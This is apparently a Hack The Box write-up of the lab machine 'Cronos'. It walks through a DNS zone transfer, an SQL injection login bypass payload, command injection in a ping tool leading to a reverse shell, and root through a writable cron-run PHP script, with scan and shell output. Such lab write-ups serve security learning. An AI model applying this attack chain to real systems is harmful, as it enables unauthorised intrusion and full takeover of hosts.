HTB - Cronos

Cronos

Getting Root

1. We execute a zone transfer using dig and got a virtual host to the admin page which is vulnerable to SQL injection.

2. Once logged in, we send the request through Burp and we can get command execution from a tool that performs ping and traceroute. Got reverse shell using python

3. We notice that root executes a php script every minute, and this script is owned by our user www-data. Replacing the php script with our code, and we get root

Tools used:

nmap, dig, burp

Nmap

# Nmap 7.80 scan initiated Tue Apr 14 22:04:44 2020 as: nmap -sC -sV -p 22,53,80 -oA nmap/cronos_all 10.10.10.13
Nmap scan report for 10.10.10.13
Host is up (0.056s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 14 22:04:59 2020 -- 1 IP address (1 host up) scanned in 15.48 seconds

Enumeration

DNS

# dig cronos.htb @10.10.10.13

; <<>> DiG 9.11.16-2-Debian <<>> cronos.htb @10.10.10.13
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12057
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;cronos.htb.                    IN      A

;; ANSWER SECTION:
cronos.htb.             604800  IN      A       10.10.10.13

;; AUTHORITY SECTION:
cronos.htb.             604800  IN      NS      ns1.cronos.htb.

;; ADDITIONAL SECTION:
ns1.cronos.htb.         604800  IN      A       10.10.10.13

;; Query time: 55 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 14 22:25:48 EDT 2020
;; MSG SIZE  rcvd: 89

Zone transfer

# dig axfr cronos.htb @10.10.10.13

; <<>> DiG 9.11.16-2-Debian <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800  
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 56 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 14 22:30:14 EDT 2020
;; XFR size: 7 records (messages 1, bytes 203)

The interesting part here is admin.cronos.htb

HTTP

On the the admin page, we tried guessing a few usernames and passwords but got nothing. However when we tried a few SQLi I was able to login using the following: Username: admin' # Password: admin

Once logged in, we are redirected to this tool which allows us to ping and traceroute

A simple test shows that we can ping our box

On our Kali box, we can see the icmp packets.

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
00:35:40.334101 IP 10.10.10.13 > 10.10.14.38: ICMP echo request, id 31905, seq 1, length 64
00:35:40.334126 IP 10.10.14.38 > 10.10.10.13: ICMP echo reply, id 31905, seq 1, length 64

Exploit

We send this ping request to Burp and notice we got command execution

Request

Response

Using a python reverse shell as the payload and we get a shell as user www-data

www-data@cronos:/var/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cronos:/var/www$ 

Privilege Escalation

Doing some enumeration on the box with linpeas.sh and the following jumped out.

The file is owned by our user and its executed by root. With that info, we replaced artisan with a reverse php script and we get a shell as root.

Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9008
Ncat: Listening on 0.0.0.0:9008
Ncat: Connection from 10.10.10.13.
Ncat: Connection from 10.10.10.13:33386.
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 07:25:01 up  2:34,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)